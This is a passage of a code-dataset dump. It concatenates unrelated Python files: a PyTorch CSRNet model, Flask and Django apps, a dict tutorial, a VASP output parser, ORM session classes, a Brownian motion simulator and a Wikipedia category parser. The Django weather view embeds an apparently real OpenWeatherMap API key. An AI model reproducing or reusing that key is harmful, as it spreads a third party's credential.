","sub_path":"efficientdet/transforms.py","file_name":"transforms.py","file_ext":"py","file_size_in_byte":4595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"477540980","text":"import torch.nn as nn\nimport torch\nimport sys\nimport os\nimport collections\nfrom torchvision import models\nimport torch.utils.model_zoo as model_zoo\nfrom l2norm import L2Norm\nimport torch.nn.functional as F\n\nmodel_urls = {\n 'vgg11': 'https://download.pytorch.org/models/vgg11-bbd30ac9.pth',\n 'vgg13': 'https://download.pytorch.org/models/vgg13-c768596a.pth',\n 'vgg16': 'https://download.pytorch.org/models/vgg16-397923af.pth',\n 'vgg19': 'https://download.pytorch.org/models/vgg19-dcbb9e9d.pth',\n 'vgg11_bn': 'https://download.pytorch.org/models/vgg11_bn-6002323d.pth',\n 'vgg13_bn': 'https://download.pytorch.org/models/vgg13_bn-abd245e5.pth',\n 'vgg16_bn': 'https://download.pytorch.org/models/vgg16_bn-6c64b313.pth',\n 'vgg19_bn': 'https://download.pytorch.org/models/vgg19_bn-c79401a0.pth',\n}\n\nclass PyramidFeatures(nn.Module):\n def __init__(self, C3_size, C4_size,feature_size=512):\n super(PyramidFeatures, self).__init__()\n # upsample C4 to get P4 from the FPN paper\n self.P4 = nn.Conv2d(C4_size, feature_size, kernel_size=1, stride=1, padding=0)\n self.P4_upsampled = nn.Upsample(scale_factor=2, mode='nearest')\n # add P4 elementwise to C3\n self.P3_1 = nn.Conv2d(C3_size, feature_size, kernel_size=1, stride=1, padding=0)\n self.P3_2 = nn.Conv2d(feature_size, feature_size, kernel_size=3, stride=1, padding=1)\n\n def forward(self, inputs):\n C3, C4 = inputs\n\n P4_x = self.P4(C4)\n P4_upsampled_x = self.P4_upsampled(P4_x)\n\n P3_x = self.P3_1(C3)\n P3_x = P3_x + P4_upsampled_x\n P3_x = self.P3_2(P3_x)\n return P3_x\n\nclass CSRNet(nn.Module):\n def __init__(self, load_weights=False):\n super(CSRNet, self).__init__()\n self.frontend_feat = [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512]\n self.backend_feat = [512, 512, 512,256,128,64]\n self.frontend = make_layers(self.frontend_feat)\n self.backend = make_layers(self.backend_feat,in_channels = 512,dilation = True)\n self.feature_map = nn.Conv2d(64,1,kernel_size=3,padding=1)\n self.seg_map = nn.Conv2d(64,4,kernel_size=3,padding=1)\n self.output_layer = nn.Conv2d(1, 1, kernel_size=1)\n self.relu = nn.ReLU(inplace=True)\n self.softmax = nn.Softmax2d()\n # self.conv_out = nn.Conv2d(1,1,kernel_size=3,padding=1)\n # self.L2Norm4_3 = L2Norm(512,8) \n # if not load_weights:\n # mod = models.vgg16(pretrained=True)\n # self._initialize_weights()\n # fsd = collections.OrderedDict()\n # # 10 convlution *(weight, bias) = 20 parameters\n # for i in range(len(self.frontend.state_dict().items())):\n # temp_key = list(self.frontend.state_dict().items())[i][0]\n # fsd[temp_key] = list(mod.state_dict().items())[i][1]\n # self.frontend.load_state_dict(fsd)\n \n # def forward(self,x):\n # s = list()\n # for j in range(23):\n # x = self.frontend[j](x)\n # if j == 15:\n # x = self.L2Norm3_3(x)\n # s.append(x)\n # x = self.L2Norm4_3(x)\n # s.append(x)\n # x = self.fpn(s)\n # x = self.backend(x)\n # x = self.output_layer(x)\n # x = F.interpolate(x,scale_factor=4)\n # return x.squeeze_(1)\n def forward(self,x):\n x = self.frontend(x)\n x = self.backend(x)\n sm = self.seg_map(x)\n sm = self.softmax(sm)\n fm = self.feature_map(x)\n max_conf, _ = torch.max(sm, dim=1, keepdim=True)\n x = torch.mul(fm,max_conf)\n x = self.output_layer(x)\n x = self.relu(x)\n x = F.interpolate(x,scale_factor=8)#, mode='bilinear')\n # x = self.conv_out(x)\n # x = self.relu(x)\n return x.squeeze_(1)\n\n # def _initialize_weights(self):\n # for m in self.modules():\n # if isinstance(m, nn.Conv2d):\n # nn.init.normal_(m.weight, 
std=0.01)\n # #nn.init.xavier_uniform_(m.weight)\n # if m.bias is not None:\n # nn.init.constant_(m.bias, 0)\n # elif isinstance(m, nn.BatchNorm2d):\n # nn.init.constant_(m.weight, 1)\n # nn.init.constant_(m.bias, 0)\n \n # def load_weights(self,base_file):\n # other, ext = os.path.splitext(base_file)\n # if ext == '.pkl' or '.pth':\n # print('Loading weights into state dict...')\n # mdata = torch.load(base_file,map_location=self.device)\n # epoch=1\n # self.load_state_dict(mdata)\n # print('Finished!')\n # else:\n # print('Sorry only .pth and .pkl files supported.')\n # return epoch\n\n # def load_vgg_weights(self):\n # print(\"Loading vgg16 weights ...\")\n # #mod = models.vgg16(pretrained = True)\n # #mod.state_dict().items()[i][1].data[:]\n # self._initialize_weights()\n # #iters = vgg_state_dict.items()\n # self.frontend.load_state_dict(model_zoo.load_url(model_urls['vgg16'], model_dir='.'), strict=False)\n # # for i in range(len(self.frontend.state_dict().items())):\n # # self.frontend.state_dict().items()[i][1].data[:] = iters[i][1].data[:]\n # print(\"Finished load weights\")\n\ndef make_layers(cfg, in_channels = 3,batch_norm=False,dilation = False):\n if dilation:\n d_rate = 2\n else:\n d_rate = 1\n layers = []\n for v in cfg:\n if v == 'M':\n layers += [nn.MaxPool2d(kernel_size=2, stride=2)]\n else:\n conv2d = nn.Conv2d(in_channels, v, kernel_size=3, padding=d_rate,dilation = d_rate)\n if batch_norm:\n layers += [conv2d, nn.BatchNorm2d(v), nn.ReLU(inplace=True)]\n else:\n layers += [conv2d, nn.ReLU(inplace=True)]\n in_channels = v\n return nn.Sequential(*layers)\n\n\nif __name__=='__main__':\n net = CSRNet()\n ina = torch.ones([1,3,112,112])\n x1 = net(ina)\n print(x1.size())","sub_path":"src/networks/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":6057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"373589825","text":"import os\n\nfrom flask import Flask, flash, jsonify, redirect, render_template, request, url_for\n\n\n\nUPLOAD_FOLDER = '/uploads'\nALLOWED_EXTENSIONS = set(['xls','xlsx','xlsm'])\n\ndef create_app(test_config=None):\n # create and configure the app\n app = Flask(__name__, instance_relative_config=True)\n app.config.from_mapping(\n SECRET_KEY='dev',\n DATABASE=os.path.join(app.instance_path, 'webapp.db'),\n )\n from . import upload\n app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\n from . import db\n db.init_app(app)\n\n from . import auth\n app.register_blueprint(auth.bp)\n #app.add_url_rule('/',endpoint='index')\n\n from . 
import upload\n app.register_blueprint(upload.bp)\n\n try:\n dir = os.path.dirname(__file__)\n os.makedirs(app.instance_path)\n except OSError:\n pass\n \n @app.route('/index')\n def test():\n return render_template('index.html')\n\n return app","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"52260142","text":"from django.shortcuts import render, redirect, HttpResponse\nimport requests\nfrom home.models import City\nfrom datetime import datetime\n\n\n# Create your views here.\n\ndef index(request):\n url='http://api.openweathermap.org/data/2.5/weather?q={}&units=metric&appid=e09dd0b214c71258c57a8720e48712e8'\n if request.method=='POST':\n a=requests.get(url.format(request.POST.get('newcity')))\n print(a)\n if a.status_code==200:\n City(name=request.POST.get('newcity'), dt=datetime.today()).save()\n\n queryset=City.objects.all()\n allcitydata=[]\n for city in queryset:\n res=requests.get(url.format(city)).json()\n cityweather={\n 'id':city.id,\n 'city':res['name'],\n 'temp':res['main']['temp'],\n 'desc':res['weather'][0]['description'],\n 'icon':res['weather'][0]['icon']\n }\n allcitydata.append(cityweather)\n\n allcitydata.reverse()\n context={'cw':allcitydata, 'l':len(allcitydata)}\n return render(request, 'index.html', context)\n\n\ndef delcity(request, cid):\n City.objects.filter(id=cid).delete()\n return redirect('/')","sub_path":"home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"142992939","text":"empty_dict = {}\n\nthis_is_dict = {'key': 'value'}\nnested_dict = {\n 'people': {\n 'Nikita': 1,\n 'Sveta': 2,\n 'Stepan': 0,\n }\n}\n\n\n# Be careful!\nthis_is_set = {'key', 'value'}\nprint(this_is_set == this_is_dict)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n# DICTS ARE MUTABLE!\nvar = {1: 'value'}\nvar.update({2: 'new value'})\nprint(var)\n\n\nvar[1] = 'mutated value'\nprint(var)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n# operations with dicts:\n\n# add:\nhero = {}\nhero.update({'name': 'Super Mario'})\nprint(hero)\n\n# get:\nprint(hero['name'])\nprint(hero.get('job', 'plumber'))\n\n# get only keys:\nprint(this_is_dict.keys())\n\n# get only values:\nprint(this_is_dict.values())\n\n# remove:\ntest_dict = {'pop-by-key': 1}\npopped = test_dict.pop('pop-by-key')\nprint(popped)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n# iterate:\nto_iterate = {1: 'x2', 2: 'x4', 3: 'x8'}\nfor key in to_iterate:\n print(key, to_iterate[key])\n\nfor key, value in to_iterate.items():\n print(key, value)\n\n","sub_path":"Школа Х5/Урок 2/types/dicts.py","file_name":"dicts.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"551169225","text":"\"\"\"Tools for parsing OUTCAR files.\"\"\"\n\n\nclass OutcarParser(object):\n \"\"\"parse OUTCAR into a dictionary, which is supposed to be turned into ParameterData later.\"\"\"\n\n def __init__(self, fname):\n super(OutcarParser, self).__init__()\n self.outcar_file = fname\n self.properties = ['volume', 'free_energy', 'free_energy_all', 'energy_without_entropy', 'energy_without_entropy_all', 'efermi']\n self._cached_data = {}\n\n @property\n def output_dict(self):\n \"\"\"Parse the OUTCAR file and return the parsed values wrapped in a dictionary\"\"\"\n output_dict = {}\n for property_name in self.properties:\n # 
_get_quantity returns a dictionary containing the property if parsing has been successful.\n            output_dict.update(self._get_quantity(property_name))\n        return output_dict\n\n    def _parse_outcar(self):\n        \"\"\"Parse the OUTCAR file into a dictionary.\"\"\"\n        result = {}\n        energy_free = []\n        energy_zero = []\n        with open(self.outcar_file, 'r') as outcar_file_object:\n            for line in outcar_file_object:\n                # volume\n                if line.rfind('volume of cell :') > -1:\n                    result['volume'] = float(line.split()[-1])\n                # Free energy\n                if line.lower().startswith(' free energy toten'):\n                    energy_free.append(float(line.split()[-2]))\n                # Extrapolated zero point energy\n                if line.startswith(' energy without entropy'):\n                    energy_zero.append(float(line.split()[-1]))\n                # Fermi energy\n                if line.rfind('E-fermi') > -1:\n                    result['efermi'] = float(line.split()[2])\n        result['free_energy'] = energy_free[-1]\n        result['energy_without_entropy'] = energy_zero[-1]\n        result['free_energy_all'] = energy_free\n        result['energy_without_entropy_all'] = energy_zero\n        return result\n\n    def _get_quantity(self, quantity):\n        \"\"\"Return the requested quantity from the _cached_data. If OUTCAR has not been parsed yet, parse it.\"\"\"\n        if not self._cached_data:\n            self._cached_data = self._parse_outcar()\n\n        if quantity not in self._cached_data:\n            return {}\n\n        return {quantity: self._cached_data[quantity]}\n","sub_path":"aiida_vasp/io/outcar.py","file_name":"outcar.py","file_ext":"py","file_size_in_byte":2334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"542058700","text":"import time\nimport random\nfrom datetime import datetime\n\nfrom storm.locals import *\n\nfrom twisted.python.hashlib import md5\nfrom twisted.python import components\n\nfrom warp import runtime\nfrom warp.common.schema import stormSchema\n\n# Default session lang\nDEFAULT_LANG = u'en_US'\n\n@stormSchema.versioned\nclass Avatar(Storm):\n    __version__ = \"warp_1\"\n    __storm_table__ = \"warp_avatar\"\n\n    id = Int(primary=True)\n    email = Unicode()\n    password = Unicode()\n\n    _roles = None\n    def _getRoles(self):\n        if self._roles is None:\n            roleLookup = runtime.config['roles']\n            avatar_roles = runtime.avatar_store.find(\n                AvatarRole, AvatarRole.avatar == self).order_by(AvatarRole.position)\n            self._roles = tuple(\n                [roleLookup[ar.role_name] for ar in avatar_roles if ar.role_name in roleLookup] +\n                [roleLookup[r] for r in runtime.config['defaultRoles']]\n            )\n\n        return self._roles\n    roles = property(_getRoles)\n\n    def __repr__(self):\n        return \"<Avatar %s>\" % self.email.encode(\"utf-8\")\n\n\n# Store flash messages\n_MESSAGES = {}\n\ndef nowstamp():\n    return int(time.mktime(datetime.utcnow().timetuple()))\n\nclass Session(components.Componentized):\n    \"\"\"\n    Base interface for session.\n\n    @ivar uid: A unique identifier for the session (GUID), C{bytes}\n\n    @ivar isPersistent: Whether session is persistent, i.e. not subject to\n        session inactivity timeout, C{bool}\n    @ivar touched: Time when session was last used, seconds since epoch, C{integer}\n\n    @ivar language: ISO locale code, e.g. en_US, C{bytes}\n\n    @ivar avatar_id: Avatar id\n    @ivar avatar: Avatar object instance\n\n    This implements methods and properties from C{twisted.web.server.Session},\n    and C{DBSession}. 
It doesn't implement session timeouts or require a database.\n    \"\"\"\n    language = DEFAULT_LANG\n    isPersistent = False\n\n    # sessionTimeout = 900\n\n    # Don't update session age if it is less than this\n    # _touch_granularity = 10\n\n    # Class variable which stores flash messages\n    _MESSAGES = {}\n\n    def __init__(self, uid):\n        \"\"\"\n        Initialize a session with a unique ID.\n\n        @param uid: Unique identifier for session, GUID.\n        @type uid: C{bytes}\n        \"\"\"\n        components.Componentized.__init__(self)\n\n        self.uid = uid\n        self.touch()\n\n        self.avatar_id = None\n        self.avatar = None\n\n    def addFlashMessage(self, msg, *args, **kwargs):\n        \"\"\"\n        Add flash message to session.\n\n        These are messages which should be displayed to the user for a single\n        page load, e.g. to indicate that an action has succeeded.\n        \"\"\"\n        if self.uid not in self._MESSAGES:\n            self._MESSAGES[self.uid] = []\n        self._MESSAGES[self.uid].append((msg, args, kwargs))\n\n    def getFlashMessages(self, clear=True):\n        \"\"\"\n        Get flash messages for session.\n\n        @param clear: Whether to clear messages after reading, default True\n        @type clear: C{bool}\n        \"\"\"\n        if self.uid not in self._MESSAGES:\n            return []\n        messages = self._MESSAGES[self.uid][:]\n        if clear:\n            del self._MESSAGES[self.uid]\n        return messages\n\n\n    def hasAvatar(self):\n        return self.avatar_id is not None\n\n    def setAvatarID(self, avatar_id):\n        \"\"\"\n        Set avatar_id for session.\n\n        Set to None when session is no longer valid.\n\n        @param avatar_id: Integer id of avatar.\n        @type avatar_id: C{integer}\n        \"\"\"\n        self.avatar_id = avatar_id\n\n\n    def setPersistent(self, is_persistent):\n        \"\"\"\n        @param is_persistent: Set whether session is persistent.\n        @type is_persistent: C{bool}\n        \"\"\"\n        self.isPersistent = is_persistent\n\n\n    def age(self):\n        \"\"\"\n        @return: Time since session was used in seconds.\n        @rtype: C{integer}\n        \"\"\"\n        return nowstamp() - self.touched\n\n    def touch(self):\n        \"\"\"\n        Indicate that the session has been used.\n\n        This is used to extend the session inactivity timeout.\n        \"\"\"\n        self.touched = nowstamp()\n        # Optimization to prevent multiple updates in a short period of time\n        # if self.age() > self._touch_granularity:\n        #     self.touched = nowstamp()\n\n    def __repr__(self):\n        return \"<Session %s>\" % self.uid\n\n\nclass SessionManagerBase(object):\n    \"\"\"\n    Base interface for SessionManager implementations.\n    \"\"\"\n    counter = 0\n    sessions = {}\n\n    def createSession(self):\n        \"\"\"\n        Generate a new Session instance.\n\n        @return: Session object\n        \"\"\"\n        uid = self._mkuid()\n        session = self.sessions[uid] = Session(uid)\n        return session\n\n    def getSession(self, uid):\n        \"\"\"\n        Get a previously generated session by its unique ID.\n\n        This raises a KeyError if the session is not found.\n\n        @type uid: string\n        @param uid: Unique id for session.\n\n        @return: Session object\n        \"\"\"\n        return self.sessions[uid]\n\n    def _mkuid(self):\n        \"\"\"\n        Create uid.\n        \"\"\"\n        self.counter = self.counter + 1\n        return md5(\"%s_%s\" % (str(random.random()), str(self.counter))).hexdigest()\n\nclass SessionManager(object):\n    \"\"\"\n    Handle sessions using database.\n    \"\"\"\n    counter = 0\n\n    def createSession(self):\n        \"\"\"\n        Create initial session.\n\n        @return: Session object\n        \"\"\"\n        uid = self._mkuid()\n        session = DBSession()\n        session.uid = uid\n        runtime.avatar_store.add(session)\n        runtime.avatar_store.commit()\n        return session\n\n    def getSession(self, uid):\n        \"\"\"\n        Get session matching uid.\n\n        @type uid: string\n        @param uid: Unique id for session.\n\n        @return: 
Session object\n \"\"\"\n return runtime.avatar_store.get(DBSession, uid)\n\n def _mkuid(self):\n \"\"\"\n Create uid.\n \"\"\"\n self.counter = self.counter + 1\n return md5(\"%s_%s\" % (str(random.random()), str(self.counter))).hexdigest()\n\n\n@stormSchema.versioned\nclass DBSession(Storm):\n # FIXME HXP: This breaks integration with MySQL and SQLite, but those are\n # not working anyway due to the missing touched column.\n __version__ = \"hxp_2\"\n __storm_table__ = \"warp_session\"\n\n uid = RawStr(primary=True)\n avatar_id = Int()\n avatar = Reference(avatar_id, Avatar.id)\n touched = Int(default_factory=nowstamp)\n\n isPersistent = Bool(default=False)\n\n language = u\"en_US\"\n messages = None\n afterLogin = None\n\n _touch_granularity = 10\n\n def __storm_loaded__(self):\n if self.language is None:\n self.language = u\"en_US\"\n if self.touched is None:\n self.touched = nowstamp()\n runtime.avatar_store.commit()\n\n\n def addFlashMessage(self, msg, *args, **kwargs):\n \"\"\"\n Add flash message to session.\n\n These are messages which should be displayed to the user for a single\n page load, e.g. to indicate that an action has succeeded.\n \"\"\"\n if self.uid not in _MESSAGES:\n _MESSAGES[self.uid] = []\n _MESSAGES[self.uid].append((msg, args, kwargs))\n\n def getFlashMessages(self, clear=True):\n \"\"\"\n Get flash messages for session.\n\n @type clear: C{boolean}\n @param clear: Whether to clear messages after reading, default True\n \"\"\"\n if self.uid not in _MESSAGES:\n return []\n messages = _MESSAGES[self.uid][:]\n if clear:\n del _MESSAGES[self.uid]\n return messages\n\n\n def hasAvatar(self):\n return self.avatar_id is not None\n\n def setAvatarID(self, avatar_id):\n self.avatar_id = avatar_id\n runtime.avatar_store.commit()\n\n\n def setPersistent(self, is_persistent):\n self.isPersistent = is_persistent\n runtime.avatar_store.commit()\n\n def age(self):\n return nowstamp() - self.touched\n\n def touch(self):\n if self.age() > self._touch_granularity:\n self.touched = nowstamp()\n runtime.avatar_store.commit()\n\n def __repr__(self):\n return \"\" % self.uid\n\n# ---------------------------\n\n@stormSchema.versioned\nclass AvatarRole(Storm):\n __version__ = \"warp_1\"\n __storm_table__ = \"warp_avatar_role\"\n\n id = Int(primary=True)\n avatar_id = Int()\n avatar = Reference(avatar_id, \"Avatar.id\")\n role_name = RawStr()\n position = Int()\n","sub_path":"warp/common/avatar.py","file_name":"avatar.py","file_ext":"py","file_size_in_byte":8551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"631223947","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Action',\n fields=[\n ('id', models.AutoField(primary_key=True, verbose_name='ID', serialize=False, auto_created=True)),\n ('name', models.CharField(max_length=128)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Book',\n fields=[\n ('id', models.AutoField(primary_key=True, verbose_name='ID', serialize=False, auto_created=True)),\n ('name', models.CharField(max_length=100)),\n ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='DishType',\n fields=[\n ('id', 
models.AutoField(primary_key=True, verbose_name='ID', serialize=False, auto_created=True)),\n ('name_type', models.CharField(max_length=100)),\n ('parent', models.ForeignKey(to='recipes.DishType')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Ingredient',\n fields=[\n ('id', models.AutoField(primary_key=True, verbose_name='ID', serialize=False, auto_created=True)),\n ('name', models.CharField(max_length=100)),\n ('note', models.CharField(max_length=1000)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Dish',\n fields=[\n ('ingredient_ptr', models.OneToOneField(serialize=False, to='recipes.Ingredient', primary_key=True, auto_created=True, parent_link=True)),\n ('verbose_name', models.CharField(max_length=100)),\n ('description', models.CharField(max_length=1000)),\n ('photo', models.ImageField(blank=True, null=True, upload_to='')),\n ('book', models.ManyToManyField(to='recipes.Book')),\n ('type', models.ForeignKey(to='recipes.DishType')),\n ],\n options={\n },\n bases=('recipes.ingredient',),\n ),\n migrations.CreateModel(\n name='RecipeAction',\n fields=[\n ('id', models.AutoField(primary_key=True, verbose_name='ID', serialize=False, auto_created=True)),\n ('comment', models.TextField()),\n ('action', models.ForeignKey(to='recipes.Action')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='RecipePart',\n fields=[\n ('id', models.AutoField(primary_key=True, verbose_name='ID', serialize=False, auto_created=True)),\n ('unit', models.CharField(max_length=100)),\n ('note', models.CharField(max_length=100)),\n ('amount', models.IntegerField()),\n ('ingredient', models.ForeignKey(to='recipes.Ingredient')),\n ('recipe', models.ForeignKey(related_name='recipe_component', to='recipes.Ingredient')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='recipeaction',\n name='recipe',\n field=models.ForeignKey(to='recipes.RecipePart'),\n preserve_default=True,\n ),\n ]\n","sub_path":"recipes/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":3890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"236494749","text":"from django.conf import settings\nfrom django.conf.urls import include, url\nfrom django.contrib import admin\n\nfrom main.main_views.bid_detail import BidDetail\nfrom main.main_views.user_dashboard import UserDetail\nfrom main.main_views.translation import (TranslationList,\n TranslationSearch,\n TranslationDetail)\nfrom main.main_views.bid import (BidsView,\n RecentBidsView,\n AddTranslationToBidView,\n GetCart)\n# from main.main_views.tags import TagList, HeaderTagList, SubheaderTagList\n# from main.main_views.admin_dashboard import *\nfrom main.main_views.user_account import UserView\nfrom main.main_views.user_list import UserList\n\nurlpatterns = [\n url(r'^admin/', include(admin.site.urls)),\n url(r'auth/me/', UserView.as_view(), name='user_details'),\n\n url(r'^$', 'main.views.api_root', name=\"api-root\"),\n\n url(r'^translation_list/$',\n TranslationList.as_view(),\n name=\"translation_list\"),\n url(r'^translation_search/$',\n TranslationSearch.as_view(),\n name=\"translation_search\"),\n url(r'^translation_detail/(?P[0-9]+)/$',\n TranslationDetail.as_view(),\n name='translation_detail'),\n url(r'^order_detail/(?P[0-9]+)/$',\n BidDetail.as_view(),\n name='order_detail'),\n\n # url(r'^admin_dashboard/items/$',\n # 
AdminListCreateTranslation.as_view(),\n # name=\"create_item\"),\n # url(r'^admin_dashboard/items/(?P[0-9]+)/$',\n # AdminTranslationDetail.as_view(),\n # name=\"item_detail_update\"),\n # url(r'^admin_dashboard/languages/$',\n # AdminListCreateLanguage.as_view(),\n # name=\"create_language\"),\n # url(r'^admin_dashboard/languages/(?P[0-9]+)/$',\n # AdminLanguageDetail.as_view(),\n # name=\"language_detail_update\"),\n # url(r'^admin_dashboard/status/$',\n # AdminListCreateStatus.as_view(),\n # name=\"create_status\"),\n # url(r'^admin_dashboard/status/(?P[0-9]+)/$',\n # AdminStatusDetail.as_view(),\n # name=\"status_detail_update\"),\n\n url(r'^add_to_cart/',\n AddTranslationToBidView.as_view(),\n name=\"add_to_cart\"),\n url(r'^get_cart/', GetCart.as_view(), name=\"get_cart\"),\n url(r'^user_dashboard/(?P[0-9]+)/$',\n UserDetail.as_view(),\n name=\"user_dashboard\"),\n\n url(r'^allBidsList/', BidsView.as_view(), name=\"all_orders\"),\n url(r'^recentBidsList/', RecentBidsView.as_view(), name=\"recent_orders\"),\n url(r'^UserList/', UserList.as_view(), name=\"user_list\"),\n\n url(r'^media/(?P.*)$',\n 'django.views.static.serve',\n {'document_root': settings.MEDIA_ROOT}),\n\n url('', include('django.contrib.auth.urls', namespace='auth')),\n url('', include('social.apps.django_app.urls', namespace='social'))\n]\n","sub_path":"project/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"570794758","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jan 31 10:53:47 2017\n\n@author: Cornelia Krome\n\nbrownianMotion\n\"\"\"\n\nimport numpy as np\n\n'''\ngeometric brownian motion with drift!\n\nSpezifikationen:\n\n mu=drift factor [Annahme von Risikoneutralitaet]\n sigma: volatility in %\n T: time span\n dt: lenght of steps\n S0: Stock Price in t=0\n W: Brownian Motion with Drift N[0,1] \n'''\n\ndef getManyBMsForManySigma(T, mu, sigmas, S0, dt, seedRange):\n # returns seedRange of BM for each sigma\n S = []\n for sigma in sigmas:\n S.append(getManyBMs(T, mu, sigma, S0, dt, seedRange))\n return S\n\ndef getManyBMs(T, mu, sigma, S0, dt, seedRange):\n # returns many BM (as many as seedRange)\n S = []\n for seed in range(seedRange):\n S.append(brownianMotion(T, mu, sigma, S0, dt, seed))\n return S\n\ndef brownianMotion(T, mu, sigma, S0, dt, seed):\n # return the values of a BM\n N = int(round(T/dt)) + 1\n t = np.linspace(0, T, N)\n if isinstance(seed, int):\n np.random.seed(seed)\n W = np.random.standard_normal(size = N)\n W = np.cumsum(W)*np.sqrt(dt) ### standard brownian motion ###\n W[0] = 0\n X = (mu-0.5*sigma**2)*t + sigma*W \n S = S0*np.exp(X) ### geometric brownian motion ###\n return S\n\nif __name__ == \"__main__\":\n T = 2\n mu = 0.\n sigmas = [0.1, 0.2]\n S0 = 20\n dt = 0.1\n seedRange = 5\n bm = getManyBMsForManySigma(T, mu, sigmas, S0, dt, seedRange)\n","sub_path":"Simulation/methods/brownianMotion.py","file_name":"brownianMotion.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"394034217","text":"# -*- coding: utf-8 -*-\r\nfrom bs4 import BeautifulSoup\r\nimport configparser\r\nimport re\r\n\r\nconfig = configparser.ConfigParser()\r\nconfigPath = './config/parser.cfg'\r\nconfig.read(configPath)\r\n\r\nurlPrefix = config['general']['url_prefix']\r\n\r\ndef extractDictFromLink(link, t):\r\n try: \r\n v = {'name': link['title'].replace('Category:',''), 'url': 
urlPrefix + link['href'], 'text': link.text, 'type':t}\r\n\r\n    except KeyError:\r\n        try:\r\n            v = {'name': link.text.replace('Category:',''), 'url': 'self', 'text': link.text, 'type':t}\r\n        except KeyError:\r\n            v = None\r\n\r\n    # bail out early if no usable link data could be extracted\r\n    if v is None:\r\n        return None\r\n\r\n    if ('(page does not exist)' in v['name']) or ('redlink=' in v['url']):\r\n        v['name'] = v['name'].replace(' (page does not exist)','')\r\n        v['url'] = None\r\n\r\n    return v\r\n\r\ndef parse(soup):\r\n    title = soup.h1.text\r\n    if 'Category:' not in title:\r\n        print('Not a category page')\r\n        return None\r\n\r\n    mainarticle = soup.find('div', {'class':'mainarticle'})\r\n    if mainarticle:\r\n        rm = mainarticle.find('a', {'title': re.compile('Wikipedia:.*')})\r\n        if rm:\r\n            rm.decompose()\r\n        #print(mainarticle)\r\n        if mainarticle.b:\r\n            if mainarticle.b.a:\r\n                mainConcept = extractDictFromLink(mainarticle.b.a, t='category')\r\n            else:\r\n                mainConcept = {'name': title.replace('Category:',''), 'url':'self', 'text':title.replace('Category:',''), 'type':'category'}\r\n        else:\r\n            mainConcept = extractDictFromLink(mainarticle.a, t='category')\r\n\r\n    else:\r\n        mainConcept = {'name': title.replace('Category:',''), 'url':'self', 'text':title.replace('Category:',''), 'type':'category'}\r\n\r\n    subcategories = [extractDictFromLink(link.a, t='category') for link in soup.findAll('div', {'class':'CategoryTreeItem'})]\r\n    if subcategories != []:\r\n        print('extracted ', len(subcategories), ' categories for', title)\r\n        return {'main': mainConcept, 'child': subcategories}\r\n    else:\r\n        if not soup.find('div',{'class':'mw-category'}):\r\n            return None\r\n        subpages = [extractDictFromLink(link, t='page') for link in soup.find('div',{'class':'mw-category'}).findAll('a')]\r\n        print('extracted ', len(subpages), ' pages for', title)\r\n        return {'main': mainConcept, 'child': subpages}\r\n\r\n#with open('./data/html/en.wikipedia.org--Category:Biological_evolution.html', 'rb') as f:\r\n#    html = f.read()\r\n#soup = BeautifulSoup(html, 'lxml')\r\n#categoryPage = parse(soup)\r\n#print(categoryPage)\r\n","sub_path":"parse/wiki/categoryPage.py","file_name":"categoryPage.py","file_ext":"py","file_size_in_byte":2579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"596417574","text":"#!/usr/bin/env python3\nimport os, sys, re\nfrom os.path import isfile, join, isdir\nfrom os import listdir\nfrom PyQt5.QtCore import (QSize, pyqtSignal)\nfrom PyQt5.QtWidgets import (QMainWindow, QApplication, QVBoxLayout, QPushButton, QWidget, QHBoxLayout, QAction, qApp, QLineEdit, QFileDialog, QStackedWidget, QLabel)\nfrom PyQt5.QtGui import (QIcon, QPixmap)\n\nclass MainWindow(QMainWindow):\n\tm_mainwidget=None\n\tprojlist=list()\n\tm_wmainwidget=None\n\tm_wapplywidget=None\n\tm_stackedwidget=None\n\tm_projectname=''\n\tm_variablelist=list()\n\tm_variablelineeditlist=list()\n\tdef 